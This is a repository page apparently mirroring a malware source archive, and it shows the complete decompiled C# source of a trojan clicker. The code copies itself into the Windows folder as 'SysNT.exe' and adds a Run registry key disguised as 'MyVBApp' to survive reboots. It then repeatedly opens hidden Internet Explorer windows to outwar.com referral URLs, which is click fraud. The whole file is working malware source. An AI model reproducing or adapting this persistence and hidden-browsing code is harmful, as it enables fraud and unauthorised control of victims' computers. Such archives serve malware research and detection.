ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-21 02:46:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan-Clicker/Win32/V/Trojan-Clicker.Win32.VB.ab-50e0a507600fd946292106f9e1248511bb79520e94b3f4bb58adbed7d20d103b/Form1.cs

187 lines
10 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: addoul2.Form1
// Assembly: addoul2, Version=1.0.1392.15754, Culture=neutral, PublicKeyToken=null
// MVID: 2FA7C981-21F3-4FB2-A6B4-E0C073EDB4CD
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Clicker.Win32.VB.ab-50e0a507600fd946292106f9e1248511bb79520e94b3f4bb58adbed7d20d103b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace addoul2
{
public class Form1 : Form
{
private IContainer components;
[STAThread]
public static void Main() => Application.Run((Form) new Form1());
public Form1()
{
this.Load += new EventHandler(this.Form1_Load);
this.InitializeComponent();
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
Size size = new Size(5, 13);
this.AutoScaleBaseSize = size;
size = new Size(292, 273);
this.ClientSize = size;
this.Name = nameof (Form1);
this.Text = nameof (Form1);
}
private void Form1_Load(object sender, EventArgs e)
{
string executablePath = Application.ExecutablePath;
string sLeft;
if (Directory.Exists("d:\\windows"))
sLeft = "D";
else if (Directory.Exists("c:\\windows"))
sLeft = "C";
else if (Directory.Exists("e:\\windows"))
sLeft = "E";
else if (Directory.Exists("f:\\windows"))
sLeft = "F";
if (StringType.StrCmp(sLeft, "D", false) == 0)
{
if (!File.Exists(sLeft + ":\\windows\\SysNT.exe"))
{
File.Copy(executablePath, sLeft + ":\\windows\\SysNT.exe", true);
RegistryKey subKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
subKey.SetValue("MyVBApp", (object) ("\"" + sLeft + ":\\windows\\SysNT.exe\""));
subKey.Close();
}
Thread.Sleep(40000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1612268", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685015", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685183", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685108", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685012", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685091", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685221", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685205", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685043", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"D:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685042", AppWinStyle.Hide);
}
else if (StringType.StrCmp(sLeft, "C", false) == 0)
{
if (!File.Exists(sLeft + ":\\windows\\SysNT.exe"))
{
File.Copy(executablePath, sLeft + ":\\windows\\SysNT.exe", true);
RegistryKey subKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
subKey.SetValue("MyVBApp", (object) ("\"" + sLeft + ":\\windows\\SysNT.exe\""));
subKey.Close();
}
Thread.Sleep(40000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1612268", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685015", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685183", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685108", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685012", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685091", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685221", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685205", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685043", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"c:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685042", AppWinStyle.Hide);
}
else if (StringType.StrCmp(sLeft, "E", false) == 0)
{
if (!File.Exists(sLeft + ":\\windows\\SysNT.exe"))
{
File.Copy(executablePath, sLeft + ":\\windows\\SysNT.exe", true);
RegistryKey subKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
subKey.SetValue("MyVBApp", (object) ("\"" + sLeft + ":\\windows\\SysNT.exe\""));
subKey.Close();
}
Thread.Sleep(40000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1612268", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685015", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685183", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685108", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685012", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685091", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685221", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685205", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685043", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"e:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685042", AppWinStyle.Hide);
}
else if (StringType.StrCmp(sLeft, "F", false) == 0)
{
if (!File.Exists(sLeft + ":\\windows\\SysNT.exe"))
{
File.Copy(executablePath, sLeft + ":\\windows\\SysNT.exe", true);
RegistryKey subKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run");
subKey.SetValue("MyVBApp", (object) ("\"" + sLeft + ":\\windows\\SysNT.exe\""));
subKey.Close();
}
Thread.Sleep(40000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1612268", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685015", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685183", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685108", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685012", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685091", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685221", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685205", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685043", AppWinStyle.Hide);
Thread.Sleep(360000);
Interaction.Shell("\"f:\\Program Files\\Internet Explorer\\IEXPLORE.EXE \" http://www.outwar.com/page.php?x=1685042", AppWinStyle.Hide);
}
this.Close();
}
}
}
Reference in New Issue Copy Permalink